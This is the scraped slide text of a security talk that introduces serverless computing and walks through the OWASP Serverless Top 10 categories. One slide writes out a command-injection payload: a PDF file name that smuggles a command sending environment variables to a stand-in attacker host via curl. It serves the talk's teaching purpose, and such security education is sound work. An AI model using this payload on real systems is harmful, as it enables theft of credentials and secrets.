Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

OWASP Serverless Top 10

526 views

Published on

Presentation that introduces Serverless technology and gives a glimpse of all the OWASP Serverless Top 10 vulnerabilities with code examples.

Published in: Software
  • Be the first to comment

OWASP Serverless Top 10

  1. 1. Serverless Top 10 INTRODUCTION TO
  2. 2. About me Chandrapal Badshah Security Enthusiast Build, Break, Build guy Would love to talk about plants ;) Contact: ● twitter.com/@bnchandrapal ● github.com/Chan9390
  3. 3. START WITH WHY - Simon Sinek
  4. 4. Once upon a time... Database Web Server CPU Memory Web Application Static Files
  5. 5. But ... Database Web Server CPU Memory Web Application Static Files
  6. 6. But ... Database Web Server CPU Memory Web Application Static Files Security: maintaining/updating operating system with security patches, WAF/firewall configuration, network monitoring, etc
  7. 7. CHANGED THE GAME
  8. 8. Introduction to Microservices
  9. 9. Introduction to Microservices Still a lot of manual work (depending on the deployment method) to scale it. Security tasks depend on the deployment method too.
  10. 10. Introduction to Serverless The phrase “serverless” doesn’t mean servers are no longer involved. It simply means that developers no longer have to think that much about them. Computing resources get used as services without having to manage around physical capabilities or limits. https://readwrite.com/2012/10/15/why-the-future-of-software-and-apps-is-serverless/
  11. 11. Introduction to Serverless https://martinfowler.com/bliki/Serverless.html
  12. 12. Cloud Providers
  13. 13. Serverless Tools & Frameworks
  14. 14. Who uses Serverless (AWS Lambda) https://aws.amazon.com/lambda/resources/customer-case-studies/
  15. 15. Features of Function-as-a-Service ➔ Stateless functions ➔ Complete abstraction ➔ Instant, Scalable and event-driven ➔ Pay for what you use ➔ Free trials (AWS lambda gives 1,000,000* lambda triggers for free every month) ➔ There is a default timeout ➔ The function guidelines are defined by the Cloud Service Provider ➔ Multiple Languages supported
  16. 16. DEMO - Deploying Serverless App
  17. 17. So simple right ?
  18. 18. What if … ?
  19. 19. One question ?
  20. 20. Do you think OWASP Serverless Top 10 vulnerabilities are different than OWASP Top 10 ?
  21. 21. Do you think OWASP Serverless Top 10 vulnerabilities are different than OWASP Top 10 ? ● The way the apps are created are similar to that of server based applications ● There’s not a lot of data from organizations on how they use serverless functions in production (and the security issues faced)
  22. 22. Let’s jump into OWASP Serverless Top 10
  23. 23. A1: Injection ● Serverless doesn’t only support HTTP triggers, they support cloud storage events, database changes, etc ● SQL/NoSQL injection ● OS Command Injection ● Code Injection - the severity depends on the permissions given to the vulnerable lambda function
  24. 24. An example scenario: CV filtering system User sends mail with CV attached Email reaches the server AWS SNS sends notification to Lambda Lambda gets the mail, parses it if there’s a PDF attachment
  25. 25. Can you see the bug ?
  26. 26. Checks if the file has file name Checks if the filename ends with .pdf Appends the filename with /tmp Executes a command pdftotext
  27. 27. Payload (to print the environment variables) foobar;env|curl -H "Content-Type: text/plain" -X POST -d @- http://attacker.site/collector #.pdf
  28. 28. A2: Broken Authentication ● Functions are Stateless ● Multiple entry points, services, events and triggers and no continuous flow - things can get worse ● Common example: the functions for internal use only are available to all
  29. 29. A3: Sensitive Data Exposure ● Depends on the architecture just like other server based applications ● Common example: having functions disclosing logs in some specific endpoint
  30. 30. A bug I recently found
  31. 31. A4: XML External Entity ● Insecure way of parsing XML files by the serverless function ● The exploitability may not always be fruitful
  32. 32. Vulnerable code …
  33. 33. Vulnerable code … Downloads the XML file from bucket and parses it.
  34. 34. The Payload ...
  35. 35. The result…
  36. 36. A5: Broken Access Control ● Functions with over privileges ● If functions are allowed to access anything on the cloud account, then attacker too if he exploits some vulnerability like code execution
  37. 37. A6: Security Misconfiguration ● Not just the function but how the function interacts with the environment ● Because of the complexity which is introduced due to increased features/functions, it’s very easy for security misconfiguration ● Can lead to DoS/timeouts ● Example: Public S3 buckets
  38. 38. A7: Cross Site Scripting (XSS) ● Most common bug affects serverless functions as well ● Mostly due to lack of user input sanitization
  39. 39. Find the bug… (scenario) User sends mail Email reaches the server AWS SNS sends notification to Lambda Lambda gets the mail, parses it and sends the message content to moderator dashboard
  40. 40. Find the bug…
  41. 41. Find the bug… Gets the message content Sends the message content to dashboard
  42. 42. A8: Insecure Deserialization ● Common in Python and NodeJS, but also affects Java and dotNET ● Mostly introduced due to insecure use of 3rd party libraries
  43. 43. Example Java payload
  44. 44. The payload in request…
  45. 45. And the result…
  46. 46. A9: Using components with known vulnerabilities ● Using dependencies which are insecure ● Most commonly found ● Not every vulnerability will affect serverless functions ● Doesn’t always guarantee you remote exploitation
  47. 47. A10: Insufficient Logging and Monitoring ● Serverless auditing is even more difficult than traditional web applications ● Since the client interacts directly with the serverless functions there is no place for implementing WAFs or any active monitoring systems ● This actually helps attackers
  48. 48. Lambda code
  49. 49. Lambda logs
  50. 50. Lambda Logs (in case of huge payload)
  51. 51. Resources OWASP Serverless Top 10: https://www.owasp.org/index.php/OWASP_Serverless_Top_10_Project OWASP Serverless Top 10 GitHub repo: https://github.com/OWASP/Serverless-Top-10-Project Serverless Security - Function-as-a-Service: https://www.youtube.com/watch?v=c5ZHPc_yG4g Securing Serverless Applications Step-by-step: https://www.youtube.com/watch?v=B3j4xql7we0 AWS Serverless Functions: https://github.com/aws-samples/aws-serverless-workshops PureSec Serverless Top 10: https://github.com/puresec/sas-top-10
  52. 52. Stay tuned ! Damn Vulnerable Serverless App on its way
  53. 53. Any Questions ?

×